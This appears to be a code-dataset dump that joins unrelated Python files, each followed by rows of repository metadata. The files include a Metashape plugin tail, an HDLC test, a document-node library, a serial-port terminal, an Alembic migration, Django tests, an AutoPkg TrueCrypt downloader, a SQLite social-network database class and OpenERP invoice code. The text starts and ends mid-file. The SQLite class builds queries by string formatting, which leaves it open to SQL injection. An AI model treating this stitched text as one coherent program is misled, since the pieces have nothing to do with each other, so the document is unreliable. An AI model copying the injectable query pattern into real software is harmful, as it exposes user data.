chunk.model.label = self.style_name
Metashape.app.messageBox("Everything worked fine!\n"
"Please save project and RESTART Metashape!\n"
"Because video memory was not released by TensorFlow!")
def model_style_transfer():
global chunk
chunk = Metashape.app.document.chunk
if chunk is None or chunk.model is None:
raise Exception("No active model!")
if chunk.model.texture is None or chunk.model.tex_vertices is None or len(chunk.model.tex_vertices) == 0:
raise Exception("Model is not textured!")
app = QtWidgets.QApplication.instance()
parent = app.activeWindow()
dlg = ModelStyleTransferDlg(parent)
label = "Custom menu/Model style transfer"
Metashape.app.addMenuItem(label, model_style_transfer)
print("To execute this script press {}".format(label))
| mit | 3,523,976,573,227,111,400 | 41.113208 | 188 | 0.620116 | false | 3.71381 | false | false | false |
realms-team/solmanager | libs/sol-REL-1.7.5.0/tests/test_hdlc.py | 3 | 3377 | import os
from sensorobjectlibrary import openhdlc as hdlc
from sensorobjectlibrary import Sol as sol
JSON = {
'timestamp': 1521645792,
'mac': '00-17-0d-00-00-58-5b-02',
'type': 33,
'value': {
'manager': '00-17-0d-00-00-58-5b-02',
'valid': True,
'snapshot': {
'getNetworkInfo': {
'numLostPackets': 0,
'advertisementState': 0,
'ipv6Address': 'fe80:0000:0000:0000:0017:0d00:0058:5b02',
'asnSize': 7250,
'numMotes': 0,
'numArrivedPackets': 0,
'netLatency': 0,
'netState': 0,
'netPathStability': 0,
'downFrameState': 1,
'maxNumbHops': 0,
'RC': 0,
'netReliability': 0
},
'timestamp_stop': 'Wed, 21 Mar 2018 15:23:12 UTC',
'getMoteConfig': {
'00-17-0d-00-00-58-5b-02': {
'macAddress': '00-17-0d-00-00-58-5b-02',
'reserved': 1,
'state': 4,
'isRouting': True,
'RC': 0,
'moteId': 1,
'isAP': True}
},
'epoch_stop': 1521645792.786726,
'getSystemInfo': {
'macAddress': '00-17-0d-00-00-58-5b-02',
'swBuild': 9,
'swPatch': 1, 'hwModel': 16, 'swMajor': 1, 'swMinor': 4,
'RC': 0, 'hwRev': 1
},
'getMoteLinks': {
'00-17-0d-00-00-58-5b-02': {
'links': []
}
},
'getMoteInfo': {
'00-17-0d-00-00-58-5b-02': {
'macAddress': '00-17-0d-00-00-58-5b-02',
'assignedBw': 0,
'stateTime': 1355,
'numGoodNbrs': 0, 'numJoins': 1, 'state': 4,
'packetsReceived': 6, 'hopDepth': 0,
'totalNeededBw': 55890, 'requestedBw': 55890, 'avgLatency': 0,
'RC': 0, 'numNbrs': 0, 'packetsLost': 0
}
},
'getPathInfo': {
'00-17-0d-00-00-58-5b-02': {
}
},
'timestamp_start': 'Wed, 21 Mar 2018 15:23:12 UTC',
'getNetworkConfig': {
'networkId': 1229, 'apTxPower': 8, 'ccaMode': 0, 'locMode': 0,
'numParents': 2, 'channelList': 32767, 'baseBandwidth': 9000,
'maxMotes': 101, 'bbSize': 1, 'bbMode': 0, 'oneChannel': 255,
'isRadioTest': 0, 'downFrameMultVal': 1, 'RC': 0,
'bwMult': 300, 'frameProfile': 1, 'autoStartNetwork': True
}
},
'name': 'snapshot'}}
JSON2 = {
'timestamp': 1521645792,
'mac': '00-17-0d-00-00-58-5b-02',
'type': 40,
'value': {
'SolManager': [2, 0, 1, 0],
'Sol': [1, 4, 0, 0],
'SmartMesh SDK': [1, 1, 2, 4]}
}
def test_hdlc():
file_name = "test_hdlc.backup"
h = hdlc.hdlcify(sol.json_to_bin(JSON))
s = "".join(chr(c) for c in h)
with open(file_name, 'ab') as f:
f.write(s)
(d,o) = hdlc.dehdlcify(file_name)
assert d[0] == sol.json_to_bin(JSON)
assert sol.bin_to_json(d[0]) == JSON
os.remove(file_name)
| bsd-3-clause | -905,223,369,981,711,500 | 33.459184 | 82 | 0.426118 | false | 3.191871 | false | false | false |
EnTeQuAk/dmlt | dmlt/node.py | 1 | 3237 | #-*- coding: utf-8 -*-
"""
dmlt.inodes
~~~~~~~~~~~
Node interface for DMLT.
:copyright: 2008 by Christopher Grebs.
:license: BSD, see LICENSE for more details.
"""
from dmlt import events
from dmlt.utils import node_repr, escape, striptags
from dmlt.query import NodeQueryMixin
class BaseNode(object):
"""
A node that represents a part of a document.
It still implements the `Query` interface to query for nodes.
Should be subclassed to implement more `format` options.
"""
__slots__ = ()
#: The node can contain children.
#: Each container node needs to implement
#: a `children` attribute to access child-nodes.
is_container = False
#: True if this is a text node
is_text_node = False
#: This node is some kind of line breaking node
#: as \n or \r\n are some.
is_linebreak_node = False
#: True if this node is a raw one.
#: Raw nodes are never processed by node-filters.
#: Use this only if the node-content matters e.g.
#: in sourcecode.
is_raw = False
is_document = False
#: the value of the node as text
text = u''
def __eq__(self, other):
return self.__class__ is other.__class__ and \
self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
__repr__ = node_repr
class Node(BaseNode, NodeQueryMixin):
def prepare(self, format='html'):
return {'html': self.prepare_html}[format]()
def prepare_html(self):
return iter(())
class DeferredNode(Node):
"""
Special node with a `replace_by()` function that can be used to replace
this node in place with another one.
"""
def __init__(self, node):
self.node = node
def replace_by(self, other):
self.__class__ = other.__class__
self.__dict__ = other.__dict__
is_container = property(lambda s: s.node.is_container)
is_text_node = property(lambda s: s.node.is_text_node)
is_raw = property(lambda s: s.node.is_raw)
class Text(Node):
"""
Represents text.
"""
is_text_node = True
def __init__(self, text=u''):
self.text = text
def prepare_html(self):
yield escape(self.text)
class HTML(Node):
"""
Raw HTML snippet.
"""
def __init__(self, html=u''):
self.html = html
@property
def text(self):
return striptags(self.html)
def prepare_html(self):
yield self.html
class Container(Node):
"""
A basic node with children.
"""
is_container = True
def __init__(self, children=None):
if children is None:
children = []
self.children = children
@property
def text(self):
return u''.join(x.text for x in self.children)
def prepare_html(self):
for child in self.children:
for item in child.prepare_html():
yield item
class Document(Container):
"""
Outermost node.
"""
is_document = True
@events.register('define-document-node')
def _handle_define_document_node(manager, *args, **kwargs):
return Document
class Raw(Container):
"""
A raw container.
"""
is_raw = True
| bsd-3-clause | -6,170,797,914,194,077,000 | 20.58 | 75 | 0.591597 | false | 3.77713 | false | false | false |
apenwarr/port | port.py | 1 | 8476 | #!/usr/bin/env python
# Copyright 2011-2012 Avery Pennarun and port.py contributors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import array
import errno
import fcntl
import os
import random
import select
import sys
import termios
import time
import tty
import options
optspec = """
port [options...] <tty>
--
s,speed= the baud rate to use [115200]
l,limit= maximum upload rate (for devices with crappy flow control) [9600]
"""
def log(s, *args):
if args:
ss = s % args
else:
ss = s
sys.stdout.flush()
sys.stderr.write(ss.replace('\n', '\r\n'))
sys.stderr.flush()
class ModemError(Exception):
pass
class AlreadyLockedError(Exception):
pass
def _speedv(speed):
try:
return termios.__dict__['B%s' % int(speed)]
except KeyError:
raise ModemError('invalid port speed: %r (try 115200, 57600, etc)'
% speed)
def _unlink(path):
try:
os.unlink(path)
except OSError, e:
if e.errno == errno.ENOENT:
return # it's deleted, so that's not an error
raise
class Lock(object):
"""Represents a unix tty lockfile to prevent overlapping access."""
def __init__(self, devname):
assert '/' not in devname
if os.path.exists('/var/lock'):
# Linux standard location
self.path = '/var/lock/LCK..%s' % devname
else:
# this is the patch minicom seems to use on MacOS X
self.path = '/tmp/LCK..%s' % devname
self.lock()
def __del__(self):
self.unlock()
def read(self):
try:
return int(open(self.path).read().strip().split()[0])
except IOError, e:
if e.errno == errno.ENOENT:
return None # not locked
else:
return 0 # invalid lock
except ValueError:
return 0
def _pid_exists(self, pid):
assert pid > 0
try:
os.kill(pid, 0) # 0 is a signal that always does nothing
except OSError, e:
if e.errno == errno.EPERM: # no permission means it exists!
return True
if e.errno == errno.ESRCH: # not found
return False
raise # any other error is weird, pass it on
return True # no error means it exists
def _try_lock(self):
try:
fd = os.open(self.path, os.O_WRONLY|os.O_CREAT|os.O_EXCL, 0666)
except OSError:
return
try:
os.write(fd, '%s\n' % os.getpid())
finally:
os.close(fd)
def lock(self):
mypid = os.getpid()
for _ in range(10):
pid = self.read()
if pid == mypid:
return
elif pid is None:
# file did not exist
self._try_lock()
elif pid > 0 and self._pid_exists(pid):
raise AlreadyLockedError('%r locked by pid %d'
% (self.path, pid))
else:
# the lock owner died or didn't write a pid. Cleaning it
# creates a race condition. Delete it only after
# double checking.
time.sleep(0.2 + 0.2*random.random())
pid2 = self.read()
if pid2 == pid and (pid == 0 or not self._pid_exists(pid)):
_unlink(self.path)
# now loop and try again. Someone else might be racing with
# us, so there's no guarantee we'll get the lock on our
# next try.
raise AlreadyLockedError('%r lock contention detected' % self.path)
def unlock(self):
if self.read() == os.getpid():
_unlink(self.path)
class Modem(object):
def __init__(self, filename, speed):
self.fd = self.tc_orig = None
if '/' not in filename and os.path.exists('/dev/%s' % filename):
filename = '/dev/%s' % filename
self.lock = Lock(os.path.basename(filename))
self.fd = os.open(filename, os.O_RDWR | os.O_NONBLOCK)
fcntl.fcntl(self.fd, fcntl.F_SETFL,
fcntl.fcntl(self.fd, fcntl.F_GETFL) & ~os.O_NONBLOCK)
self.tc_orig = tc = termios.tcgetattr(self.fd)
tc[4] = tc[5] = _speedv(speed)
tc[2] &= ~(termios.PARENB | termios.PARODD)
tc[2] |= termios.CLOCAL
termios.tcsetattr(self.fd, termios.TCSADRAIN, tc)
tty.setraw(self.fd)
def __del__(self):
self.close()
def close(self):
if self.fd is not None:
try:
termios.tcsetattr(self.fd, termios.TCSADRAIN, self.tc_orig)
except:
pass
os.close(self.fd)
def flags(self):
bits = [(i, getattr(termios,i))
for i in dir(termios)
if i.startswith('TIOCM_')]
tbuf = array.array('i', [0])
fcntl.ioctl(self.fd, termios.TIOCMGET, tbuf, True)
out = []
for name, bit in sorted(bits):
if tbuf[0] & bit:
out.append(name[6:])
return ', '.join(out)
def sendbreak(self):
termios.tcsendbreak(self.fd, 0)
def main():
o = options.Options(optspec)
(opt, flags, extra) = o.parse(sys.argv[1:])
if len(extra) != 1:
o.fatal("exactly one tty name expected")
filename = extra[0]
if opt.limit and opt.limit < 300:
o.fatal('--limit should be at least 300 bps')
if opt.limit > max(115200, int(opt.speed)):
o.fatal('--limit should be no more than --speed')
tc_stdin_orig = termios.tcgetattr(0)
modem = Modem(filename, opt.speed)
line = ''
MAGIC = ['~.', '!.']
try:
tty.setraw(0)
mflags = None
last_out = 0
if opt.limit:
secs_per_byte = 1.0 / (float(opt.limit) / 10)
assert(secs_per_byte < 0.1)
log('(Type ~. or !. to exit, or ~b to send BREAK)')
while 1:
newflags = modem.flags()
if newflags != mflags:
mflags = newflags
log('\n(Line Status: %s)\n', mflags)
r,w,x = select.select([0,modem.fd], [], [])
if 0 in r:
buf = os.read(0, 1)
if buf in '\r\n\x03':
line = ''
else:
line += buf
if line in MAGIC:
break
if line == '~b':
log('(BREAK)')
modem.sendbreak()
line = ''
elif len(buf):
os.write(modem.fd, buf)
if opt.limit:
time.sleep(secs_per_byte)
if modem.fd in r:
buf = os.read(modem.fd, 4096)
if len(buf):
os.write(1, buf)
if buf == '\0':
log('\n(received NUL byte)\n')
finally:
termios.tcsetattr(0, termios.TCSANOW, tc_stdin_orig)
if __name__ == '__main__':
try:
main()
except AlreadyLockedError, e:
sys.stderr.write('error: %s\n' % e)
exit(1)
| bsd-2-clause | -8,557,969,775,399,282,000 | 30.392593 | 77 | 0.541529 | false | 3.831826 | false | false | false |
selenamarie/nuthatch | migrations/versions/3394654f4780_.py | 1 | 1043 | """empty message
Revision ID: 3394654f4780
Revises: 23c49602b4ca
Create Date: 2015-01-30 14:49:18.237825
"""
# revision identifiers, used by Alembic.
revision = '3394654f4780'
down_revision = '23c49602b4ca'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('queries',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('slug', postgresql.UUID(), nullable=True),
sa.Column('query', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.add_column(u'results', sa.Column('query_id', sa.Integer(), nullable=True))
op.add_column(u'results', sa.Column('result_url', sa.String(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column(u'results', 'result_url')
op.drop_column(u'results', 'query_id')
op.drop_table('queries')
### end Alembic commands ###
| mpl-2.0 | 6,663,940,205,437,048,000 | 28.8 | 82 | 0.680729 | false | 3.249221 | false | false | false |
deadlylaid/book_connect | wef/items/tests/booksale.py | 1 | 1589 | from django.core.urlresolvers import resolve
from django.test import TestCase
from items.models.item_post import ItemPost
from wef.views import Home
from items.views.booksale import BookSale
from wef.mixins.tests import SetUpLogInMixin
class BookSalePageTest(SetUpLogInMixin):
def test_booksale_url_resolves_to_home_view(self):
found = resolve('/booksale/')
self.assertEqual(found.func.__name__, BookSale.__name__)
def test_booksale_page_template(self):
response = self.client.get('/booksale/')
self.assertTemplateUsed(response, 'items/booksale.html')
class NewBookSaleTest(SetUpLogInMixin):
def test_client_post_books(self):
send_post_data_post = self.client.post(
'/booksale/',
data={
'title': '책 팝니다',
'book': ['book1', 'book2'],
'price': ['1000', '2000'],
}
)
new_post = ItemPost.objects.first()
self.assertEqual(new_post.title, '책 팝니다')
send_post_price_is_null_data = self.client.post(
'/booksale/',
data={
'title': '책팜2',
'book': ['book1', 'book2'],
'price': ['가격미정', '2000'],
'is_price_null': ['True', 'True'],
}
)
second_post = ItemPost.objects.last()
self.assertEqual(second_post.title, '책팜2')
self.assertEqual(second_post.booklist_set.first().bookprice, 0)
| mit | -7,484,518,541,001,545,000 | 29.529412 | 71 | 0.550417 | false | 3.663529 | true | false | false |
paulsuh/paul-suh-recipes | TrueCrypt/TrueCryptURLProvider.py | 1 | 2381 | #!/usr/bin/env python
import re
import urllib
import urllib2
from autopkglib import Processor, ProcessorError
__all__ = ["TrueCryptURLProvider"]
DLV_URL = 'http://www.truecrypt.org/downloads'
DLS_URL = 'http://www.truecrypt.org/dl'
re_verfind = re.compile('<input type="hidden" name="DownloadVersion" value="([0-9A-Za-z\.]*)">')
class TrueCryptURLProvider(Processor):
'''Provides URL to the latest TrueCrypt installer DMG.'''
input_variables = {
}
output_variables = {
'url': {
'description': 'URL to the latest download',
},
'truecrypt_version': {
'description': 'Version number',
}
}
description = __doc__
def get_version(self):
try:
f = urllib2.urlopen(DLV_URL)
content = f.read()
f.close()
except BaseException as e:
raise ProcessorError('Could not retrieve URL: %s' % DLV_URL)
m = re_verfind.search(content)
if m:
return m.group(1)
raise ProcessorError('No version found')
def get_url(self, version):
'''Get the URL of the TrueCrypt DMG
The TrueCrypt website has an HTML form that, when POSTed, returns
a 302 redirect to the actual DMG download. Handle all of that, as
ugly as it is, using urllib2.
'''
# no easy way to *not* follow redirects with urllib2, so do this
class NoRedirectHandler(urllib2.HTTPRedirectHandler):
def redirect_request(self, req, fp, code, msg, hdrs, newurl):
pass
submit_form = {
'DownloadVersion': version,
'MacOSXDownload': 'Download',
}
try:
req = urllib2.Request(DLS_URL, urllib.urlencode(submit_form))
opener = urllib2.build_opener(NoRedirectHandler)
f = opener.open(req)
content = f.read()
f.close()
except BaseException as e:
if isinstance(e, urllib2.HTTPError) and e.code == 302:
url = e.headers['Location']
else:
raise ProcessorError('Could not retrieve URL: %s' % DLS_URL)
# hack to re-assemble URL with urlencoded filename part
url_split = url.split('/')
new_url = '/'.join(url_split[0:3]) + '/'
new_url += urllib.pathname2url('/'.join(url_split[3:]))
return new_url
def main(self):
self.env['truecrypt_version'] = self.get_version()
self.output('Version: %s' % self.env['truecrypt_version'])
self.env['url'] = self.get_url(self.env['truecrypt_version'])
self.output('URL: %s' % self.env['url'])
if __name__ == '__main__':
processor = TrueCryptURLProvider()
processor.execute_shell()
| apache-2.0 | 8,546,031,501,821,073,000 | 24.063158 | 96 | 0.672827 | false | 3.010114 | false | false | false |
tur103/social-network | server/database.py | 1 | 11888 | """
Author : Or Israeli
FileName : database.py
Date : 5.5.17
Version : 1.0
"""
import sqlite3
from constants import *
import os
class DataBase(object):
def __init__(self, path):
object.__init__(self)
self.database = sqlite3.connect(path)
def create_database(self):
"""
The function creates a new users database table.
"""
self.database.execute('''create table user(username text primary key
not null, password text unique not null, email
text unique not
null, online int not null);''')
def drop_database(self):
"""
The function deletes the users database table.
"""
self.database.execute("drop table if exists user")
def create_friends_database(self):
"""
The function creates a new friends database table.
"""
self.database.execute('''create table friends(user text primary key
not null);''')
def drop_friends_database(self):
"""
The function deletes the friends database table.
"""
self.database.execute("drop table if exists friends")
def create_requests_database(self):
"""
The function creates a new requests database table.
"""
self.database.execute('''create table requests(user text primary key
not null);''')
def drop_requests_database(self):
"""
The function deletes the requests database table.
"""
self.database.execute("drop table if exists requests")
def create_chat_database(self):
"""
The function creates a new chat database table.
"""
self.database.execute('''create table chat(too text not null,
frm text not null, message text not null);''')
def drop_chat_database(self):
"""
The function deletes the chat database table.
"""
self.database.execute("drop table if exists chat")
def add_message(self, to, frm, message):
"""
The function adds a new message to the chat table.
Args:
to (string): The addressee of the message.
frm (string): The sender of the message.
message (string): The body of the message.
"""
self.database.execute("insert into chat (too, frm, message) "
"values ('%s', '%s', '%s')" % (to, frm,
message))
self.database.commit()
def get_message(self, to):
"""
The function finds all the messages that were sent to the user,
returns them and deletes them from the chat database.
Args:
to (string): The username of the user.
Returns:
list: The list of the messages that were sent to the user.
"""
cursor = self.database.execute("select too, frm, message from chat")
messages_list = []
for row in cursor:
if row[0] == to:
messages_list.append((row[0], row[1], row[2]))
try:
self.database.execute("delete from chat where too = '%s'" % to)
self.database.commit()
except sqlite3.IntegrityError:
pass
return messages_list
def get_requests(self):
"""
The function returns all the friendship requests that were sent
to the user.
Returns:
list: The list of the friendship requests.
"""
cursor = self.database.execute("select user from requests")
requests = []
for raw in cursor:
requests.append(raw[0])
return requests
def get_friends(self):
"""
The function returns all the friends of the user.
Returns:
list: The list of the friends.
"""
cursor = self.database.execute("select user from friends")
friends = []
for raw in cursor:
friends.append(raw[0])
return friends
def delete_request(self, user):
"""
The function deletes a friendship request that was sent
to the user by another user.
Args:
user (string): The user that sent the friendship request.
Returns:
bool: If the request was deleted or not.
"""
requests_list = self.get_requests()
if user in requests_list:
self.database.execute("delete from requests where user = '%s'"
% user)
self.database.commit()
return True
else:
return False
def add_friend(self, user):
"""
The function adds a new friend to the user's database.
Args:
user (string): The user that join to the friends list.
"""
self.database.execute("insert into friends (user) values ('%s')"
% user)
self.database.commit()
def add_request(self, user):
"""
The function adds a new request to the user's database.
Args:
user (string): The user that sent the friendship request.
Returns:
bool: If the request was added or not.
"""
try:
self.database.execute("insert into requests (user) values ('%s')"
% user)
self.database.commit()
return True
except sqlite3.IntegrityError:
return False
def add_user(self, credentials):
"""
The function adds a new user to the social network.
It gets his credentials and registers him.
Args:
credentials (list): List of the 3 credentials
(username, password and email address).
Returns:
bool: If the registration was successfully or not.
"""
username = credentials[0]
password = credentials[1]
email = credentials[2]
if not username or not password or not email:
return False
try:
self.database.execute("insert into user (username, password, "
"email, online) values ('%s', '%s', '%s', "
"1)" % (username, password, email))
self.database.commit()
os.mkdir(DIRECTORY + username)
return True
except sqlite3.IntegrityError:
return False
def update_user(self, username, value):
"""
The function turns the user's status from online to offline
or from offline to online.
Args:
username (string): The user that want to change his status.
value (int): Online or Offline (1 or 0).
"""
if value == CHANGE:
onof = self.check_online(username)
if onof == 1:
value = 0
if onof == 0:
value = 1
else:
value = int(value)
self.database.execute("update user set online = %s where "
"username='%s'" % (value, username))
self.database.commit()
def check_user(self, credentials):
"""
The function checks if the user's credentials are correct when
he wants to log in.
Args:
credentials (list): List of the 2 credentials
(username and password).
Returns:
bool: If the user's credentials are correct or not.
"""
username = credentials[0]
password = credentials[1]
cursor = self.database.execute("select username, password from user")
for raw in cursor:
if raw[0] == username and not self.check_online(username):
if raw[1] == password:
self.update_user(username, 1)
return True
else:
return False
def get_users(self):
"""
The function returns all the users that exists in the
server's database.
Returns:
list: The list of all the user names.
"""
cursor = self.database.execute("select username from user")
usernames_list = []
for raw in cursor:
usernames_list.append(raw[0])
return usernames_list
def delete_user(self, username):
"""
The function deletes a user from the social network.
Args:
username (string): The username of the user.
"""
self.database.execute("delete from user where username = %s" %
username)
self.database.commit()
def check_online(self, username):
"""
The function checks if the user is online or offline.
Args:
username (string): The username of the user.
Returns:
int: If the user is online or offline (1 or 0).
"""
cursor = self.database.execute("select username, online from user")
for raw in cursor:
if raw[0] == username:
return raw[1]
def change_email(self, username, email):
"""
The function changes the email address of the user.
Args:
username (string): The username of the user that want to change
his email address.
email (string): The new email address.
Returns:
bool: If the email address was change or not.
"""
try:
self.database.execute("update user set email = '%s' "
"where username = '%s'" % (email, username))
self.database.commit()
return True
except sqlite3.IntegrityError:
return False
def change_password(self, username, password):
"""
The function changes the password of the user.
Args:
username (string): The username of the user that want to change
his password.
password (string): The new password.
Returns:
bool: If the password was change or not.
"""
try:
self.database.execute("update user set password = '%s' "
"where username = '%s'" % (password,
username))
self.database.commit()
return True
except sqlite3.IntegrityError:
return False
def get_email(self, username):
"""
The function returns the email address of the received user.
Args:
username (string): The username to get his email address.
Returns:
string: The email address of the user.
"""
cursor = self.database.execute("select username, email from user")
for raw in cursor:
if raw[0] == username:
return raw[1]
def get_password(self, username, email):
"""
The function returns the password of the received user.
Args:
username (string): The username to get his password.
email (string): The email address of the user.
Returns:
string: The password of the user.
"""
cursor = self.database.execute("select username, email, password "
"from user")
for raw in cursor:
if raw[0] == username and raw[1] == email:
return raw[2]
return False
def close_database(self):
"""
The function closes the database.
"""
self.database.close()
| mit | 8,901,477,501,509,801,000 | 26.971765 | 78 | 0.527338 | false | 4.978224 | false | false | false |
thinkasoft/ProyectoRD-dev | l10n_ve_imex/model/invoice.py | 1 | 8350 | # -*- encoding: utf-8 -*-
###############################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (c) 2013 Vauxoo C.A. (http://openerp.com.ve/)
# All Rights Reserved
############# Credits #########################################################
# Coded by: Juan Marzquez (Tecvemar, c.a.) <[email protected]>
# Katherine Zaoral <[email protected]>
# Planified by:
# Juan Marquez <[email protected]>
# Humberto Arocha <[email protected]>
# Audited by: Humberto Arocha <[email protected]>
###############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
from openerp.osv import osv, fields
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
class account_invoice(osv.osv):
_inherit = "account.invoice"
def _get_imex_invoices(self, cr, uid, ids, name, args, context=None):
context = context or {}
ids = isinstance(ids, (int, long)) and [ids] or ids
res = {}.fromkeys(ids, False)
for inv in self.browse(cr, uid, ids, context={}):
for ait in inv.imex_tax_line:
res[inv.id] = ait.cfl_id.customs_form_id.id
return res
def _get_inv_from_ait(self, cr, uid, ids, context=None):
'''
Returns
'''
context = context or {}
ids = isinstance(ids, (int, long)) and [ids] or ids
ait_obj = self.pool.get('account.invoice.tax')
ait_brw = ait_obj.browse(cr, uid, ids, context=context)
return list(set([i.invoice_id.id for i in ait_brw if i.imex_inv_id]))
_columns = {
'customs_form_id': fields.function(
_get_imex_invoices, method=True,
type='many2one', relation='customs.form',
string='Customs form',
store={
'account.invoice.tax':(_get_inv_from_ait, ['imex_inv_id'], 50),
}, help="This is the VAT Withholding Document where this invoice is being withheld"),
'imex_tax_line': fields.one2many(
'account.invoice.tax', 'imex_inv_id', 'Vat lines', readonly=True,
attrs="{'readonly':[('vat_detail','=',True)], \
'required':[('vat_detail','=',True)]}",),
'expedient':fields.boolean('Dossier',
help="If it is true, it means this is a \
landindg form, you will need to load this \
format as an purchase invoice to declarate \
on Book"),
}
def on_change_customs_form_id(self, cr, uid, ids, customs_form_id, context=None):
context = context or {}
res = {}
if customs_form_id:
imp = self.pool.get('customs.form').browse(cr, uid,
customs_form_id,
context=context)
res = {'value': {'num_import_form': imp.name,
'import_invo': imp.date_liq}}
return res
def test_open(self, cr, uid, ids, *args):
so_brw = self.browse(cr, uid, ids, context={})
for item in so_brw:
if item.customs_form_id and \
item.customs_form_id.state in ('draft', 'cancel'):
raise osv.except_osv(_('Error!'), _(
'Can\'t validate a invoice while the form 86 state\'s is \
cancel or draft (%s).\nPlease validate the form 86 first.')
% item.customs_form_id.name)
return super(account_invoice, self).test_open(cr, uid, ids, args)
class account_invoice_tax(osv.osv):
_inherit = 'account.invoice.tax'
_columns = {
'cfl_id': fields.many2one('customs.form.line',
'Vat line',
ondelete='cascade'),
'imex_inv_id': fields.many2one('account.invoice', 'Imex Invoice',
ondelete='cascade', select=True),
'partner_id': fields.related('imex_inv_id', 'partner_id',
type='many2one', relation='res.partner',
string='Supplier',store=False, readonly=True),
'supplier_invoice_number': fields.related('imex_inv_id', 'supplier_invoice_number', type='char',
string='Invoice ref', size=64, store=False,
readonly=True),
}
_defaults = {
}
#~ _sql_constraints = [
#~ ('base_gt_zero', 'CHECK (base>0)',
#~ 'The base amount must be > 0!'),
#~ ('amount_zero', 'CHECK (amount>=0)',
#~ 'The tax amount must be >= 0!'),
#~ ]
#~ def on_change_cfl_id(self, cr, uid, ids,
#~ cfl_id):
#~ '''
#~ Create a domain to filter invoice_id for invoices listed in
#~ customs_form.invoice_ids only
#~ http://help.openerp.com/question/11180/how-to-create-a-domain-for-
#~ field-in-parentparent-model/
#~ '''
#~ res = {}
#~ if cfl_id:
#~ line_obj = self.pool.get('customs.form.line')
#~ invoices = [i.id for i in line_obj.browse(
#~ cr, uid, cfl_id).customs_form_id.invoice_ids]
#~ res = {'domain': {'invoice_id': [('id','in',invoices)]}}
#~ return res
def on_change_amount(self, cr, uid, ids, tax_id, base_amount, tax_amount,
context=None):
""" To autocompute base or tax, only for percent based taxes. """
context = context or {}
res = {}
if tax_id:
obj_vat = self.pool.get('account.tax')
vat = obj_vat.browse(cr, uid, tax_id, context=context)
if vat.type == 'percent':
if base_amount == 0 and tax_amount > 0:
base_amount = round(tax_amount / vat.amount, 2)
res = {'value': {'base_amount': base_amount,
'tax_amount': tax_amount}}
if base_amount > 0 and tax_amount == 0:
res = {'value': {'base_amount': 0.0,
'tax_amount': tax_amount}}
return res
def on_change_invoice_id(self, cr, uid, ids, invoice_id, context=None):
context = context or {}
rp_obj = self.pool.get('res.partner')
res = {}
if invoice_id:
obj_inv = self.pool.get('account.invoice')
inv_brw = obj_inv.browse(cr, uid, invoice_id, context=context)
acc_part_brw = rp_obj._find_accounting_partner(inv_brw.partner_id)
res = {'value': {'partner_id': acc_part_brw.id,
'supplier_invoice_number': inv_brw.supplier_invoice_number}}
return res
def on_change_tax_id(self, cr, uid, ids, tax_id, context=None):
context = context or {}
res = {}
if tax_id:
at_obj = self.pool.get('account.tax')
tax_brw = at_obj.browse(cr, uid, tax_id, context=context)
if tax_brw:
res = {'value': {'account_id': tax_brw.account_collected_id.id,
'name': tax_brw.name}}
else:
res = {'value': {'account_id': False, 'name': False}}
return res
| agpl-3.0 | 4,054,325,678,371,464,000 | 44.380435 | 104 | 0.502156 | false | 3.914674 | false | false | false |
ourway/marmoolak | setup.py | 1 | 1727 | import glob
import imp
import io
import os
from os import path
from setuptools import setup, find_packages, Extension
import sys
MYDIR = path.abspath(os.path.dirname(__file__))
# NOTE
REQUIRES = ['fysom', 'redis']
cmdclass = {}
ext_modules = []
setup(
name='marmoolak',
version='1.0.7',
description='Yet another finite state machine with memory and callbacks.',
long_description=io.open('README.rst', 'r', encoding='utf-8').read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Natural Language :: English',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Programming Language :: Python :: Implementation :: Jython',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
],
keywords='fsm workflow engine disk memory easy simple iran tehran',
author='Farsheed Ashouri',
author_email='[email protected]',
url='https://github.com/ourway/marmoolak',
license='Apache 2.0',
